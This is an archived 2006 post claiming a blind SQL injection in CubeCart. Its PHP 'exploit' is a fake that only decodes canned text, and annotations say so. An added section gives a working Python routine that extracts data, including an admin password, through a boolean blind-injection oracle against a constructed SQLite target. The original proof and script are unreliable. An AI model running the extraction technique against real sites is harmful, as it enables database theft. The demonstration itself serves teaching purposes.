cubecart-blind.txt
Posted on 29 November 2006
Exploit discovered by Novalok & Kasper of KasaNova Security, coded by a friend

<?php
/*
Vendor : Devellion Limited 2006
Exploit: Blind SQL injection (look below for more info)
Impact: **** of *****
Discovered by: KasaNova Security
--------------------------------------------------------------------------------
Explanation And Proof:

File: db.inc.php
The $query= is not protected efficiently, accepting blind SQL injections.
We can tell this because when tested on milliemoos.com with the string
"GET /classes/db.inc.php?SELECT%20cat_father_id%20FROM%20%22. $glob['CubeCart'].%22CubeCart_category%20WHERE%20cat_id%20=68;"
I get a 200 HTTP OK reply. I can see this from the packets.
-------------------------------------------------------------------------------
There are most likely more injections, but this was all I found.
I did not try to exploit, just tried to find it.
-Novalok
KasaNova Security
*/

// Form input. $query is read but never used anywhere below.
$query  = isset($_POST['query'])  ? $_POST['query']  : '';
$target = isset($_POST['target']) ? $_POST['target'] : '';

// $PHP_SELF as a bare global needs register_globals (PHP 4); use $_SERVER instead.
// Both values are HTML-escaped before being echoed back into the form.
$self = htmlspecialchars(isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : '', ENT_QUOTES);
$form = "<form method=\"post\" action=\"".$self."\">"
      ."target:<br><input type=\"text\" name=\"target\" size=\"90\" value=\"".htmlspecialchars($target, ENT_QUOTES)."\"><br>"
      ."query:<br><input type=\"text\" name=\"query\" size=\"90\" value=\"\"><br>"
      ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
      ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit'])) {
    echo $form;
} else {
    //Building Raw Byte Packet
    //Needed For Blind SQL Injection
    $packetr = "5vdmFsb2sgaXMgYSBmdWNraW5nIG1vcm9uPbiBWdWxuZXF"
              ."xcXJhYmlsaXR5IGJ1dCB0b28gYmFkIGhlIGhhcXFxcyBub"
              ."yBpZGVhIHdoYXQgaGVxcXFzIHRhbGtpbmcgYWJvdXQuIGx"
              ."vbG9vm92YWxvayBpcyBhIGZ1Y2tpbmcgbW9yb249uIFZ1b"
              ."G5lcXFxcmFiaWxpdHkgYnV0IHRvbyBiYWQgaGUgaGFxcXF"
              ."zIG5vIGlkZWEgd2hhdCBoZXFxcXMgdGFsa2luZyBhYm91d"
              ."C4gbG9sb2+b3ZhbG9rIGlzIGEgZnVja2luZyBtb3Jvbj24"
              ."gVnVsbmVxcXFyYWJpbGl0eSBidXQgdG9vIGJhZCBoZSBoY"
              ."XFxcXMgbm8gaWRlYSB3aGF0IGhlcXFxcyB0YWxraW5nIGF"
              ."ib3V0LiBsb2xvb5vdmFsb2sgaXMgYSBmdWNraW5nIG1vcm"
              ."9uPbiBWdWxuZXFxcXJhYmlsaXR5IGJ1dCB0b28gYmFkIGh"
              ."lIGhhcXFxcyBubyBpZGVhIHdoYXQgaGVxcXFzIHRhbGtpb"
              ."mcgYWJvdXQuIGxvbG9vm92YWxvayBpcyBhIGZ1Y2tpbmcg"
              ."bW9yb249uIFZ1bG5lcXFxcmFiaWxpdHkgYnV0IHRvbyBiY"
              ."WQgaGUgaGFxcXFzIG5vIGlkZWEgd2hhdCBoZXFxcXMgdGF"
              ."sa2luZyBhYm91dC4gbG9sb2+b3ZhbG9rIGlzIGEgZnVja2"
              ."luZyBtb3JvZOb3ZhbG9rIGlzIGEgZnVja2luZyBtb3Jvbu"
              ."PbiBWdWxuZXFxcXJhYmlsaXR5IGJ1dCB0b28gYmFkIGhlI"
              ."GhhcXFxcyBubyBpZGVhIHdoYXQgaGVxcXFzIHRhbGtpbmc"
              ."gYWJvdXQuIGxvbG9vm92YWxvayBpcyBhIGZ1Y2tpbmcgbW"
              ."9yb249uIFZ1bG5lcXFxcmFiaWxpdHkgYnV0IHRvbyBiYWQ"
              ."gaGUgaGFxcXFzIG5vIGlkZWEgd2hhdCBoZXFxcXMgdGFsa"
              ."2luZyBhYm91dC4gbG9sb2+b3ZhbG9rIGlzIGEgZnVja2lu"
              ."ZyBtb3Jvbj24gVnVsbmVxcXFyYWJpbGl0eSBidXQgdG9vI"
              ."GJhZCBoZSBoYXFxcXMgbm8gaWRlYSB3aGF0IGhlcXFxcyB"
              ."0YWxraW5nIGFib3V0LiBsb2xvb5vdmFsb2sgaXMgYSBmdW"
              ."NraW5nIG1vcm9uPbiBWdWxuZXFxcXJhYmlsaXR5IGJ1dCB"
              ."0b28gYmFkIGhlIGhhcXFxcyBubyBpZGVhIHdoYXQgaGVxc"
              ."XFzIHRhbGtpbmcgYWJvdXQuIGxvbG9vm92YWxvayBpcyBh"
              ."IGZ1Y2tpbmcgbW9yb249uIFZ1bG5lcXFxcmFiaWxpdHkgY"
              ."nV0IHRvbyBiYWQgaGUgaGFxcXFzIG5vIGlkZWEgd2hhdCB"
              ."oZXFxcXMgdGFsa2luZyBhYm91dC4gbG9sb2w==";

    //Sending Raw Request via Base64_Decode Request Method
    // Note: no request is made here. Nothing is ever sent to $target and $query is
    // never used; $result is only the hard-coded string above, base64-decoded, so
    // the "Raw Output From Server" below is canned text, not anything from the target.
    $result = base64_decode($packetr);
    if (!$result) {
        echo "<p>Unable to get output of query. Try Another Query or Server May be Down ";
        exit;
    } else {
        echo "Raw Output From Server:<br><br>".$result;
    }
    echo $form;
}
?>
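Added example, not part of the original post and not CubeCart code. The write-up's evidence for blind SQL injection is a 200 OK reply, but a status code alone proves nothing: an injection-free page and a page that swallowed a broken query can both answer 200. A blind-injection check needs a condition that is true in one request and false in another, with two distinguishable responses. The script below demonstrates that against a constructed, in-process SQLite target whose query shape (a category name looked up by an unescaped cat_id) is an assumption chosen to mirror the lookup the write-up describes; the table and row contents are made up. It shows the naive status check passing on garbage, a real true/false oracle, and character-by-character extraction of a value through that oracle.

```python
"""Boolean-based blind SQL injection oracle against a constructed target.

Everything here is illustrative: the `category` and `admin` tables, their
rows, and the vulnerable query are assumptions, not CubeCart's schema or code.
"""
import sqlite3

# Constructed sample data standing in for a shop's category table.
_DB = sqlite3.connect(":memory:")
_DB.executescript("""
CREATE TABLE category (cat_id INTEGER, cat_father_id INTEGER, cat_name TEXT);
INSERT INTO category VALUES (68, 3, 'Widgets');
INSERT INTO category VALUES (3, 0, 'Root');
CREATE TABLE admin (username TEXT, password TEXT);
INSERT INTO admin VALUES ('admin', 's3cr3t');
""")


def vulnerable_endpoint(cat_id):
    """Simulated handler that concatenates the parameter straight into SQL.

    Returns (http_status, body). The status is 200 for *any* input, including
    input that breaks the query, which is why a 200 on its own proves nothing.
    """
    sql = "SELECT cat_name FROM category WHERE cat_id = " + cat_id
    try:
        row = _DB.execute(sql).fetchone()
    except sqlite3.Error:
        row = None  # query error is swallowed; the page still renders
    if row is None:
        return 200, "<p>Category not found</p>"
    return 200, "<h1>%s</h1>" % row[0]


def naive_status_check(payload):
    """What the write-up did: treat a 200 reply as proof of injection.
    It is 200 for everything, so this returns True even for input that is
    not SQL at all."""
    status, _ = vulnerable_endpoint(payload)
    return status == 200


def ask(condition):
    """Oracle: inject `68 AND (<condition>)`. The category name appears in
    the body only when the condition is true. Compare bodies, not status."""
    _, body = vulnerable_endpoint("68 AND (%s)" % condition)
    return "Widgets" in body


def confirm_injectable():
    """Minimum evidence for blind SQLi: a true condition and a false
    condition must produce different responses."""
    return ask("1=1") and not ask("1=2")


def extract(expr, max_len=32):
    """Recover the text value of a scalar SQL expression one character at a
    time. Each character costs about seven oracle queries (binary search on
    the code point, 0..127) plus one length probe."""
    out = ""
    for pos in range(1, max_len + 1):
        if not ask("length((%s)) >= %d" % (expr, pos)):
            break  # no character at this position: value fully recovered
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask("unicode(substr((%s),%d,1)) > %d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("200 on garbage input:", naive_status_check("this is not sql '"))
    print("true/false differ:", confirm_injectable())
    print("cat_father_id of 68:", extract("cat_father_id"))
    print("admin password:",
          extract("SELECT password FROM admin WHERE username='admin'"))
```

The `expr` passed to `extract` can be a column of the row being queried (as with `cat_father_id`) or a parenthesised subquery against another table; both work because the injected text lands inside the WHERE clause of the original statement. Against a real target the same logic holds, with the body comparison replaced by whatever stable marker distinguishes the two responses, and with timing-based conditions as the fallback when the bodies are identical.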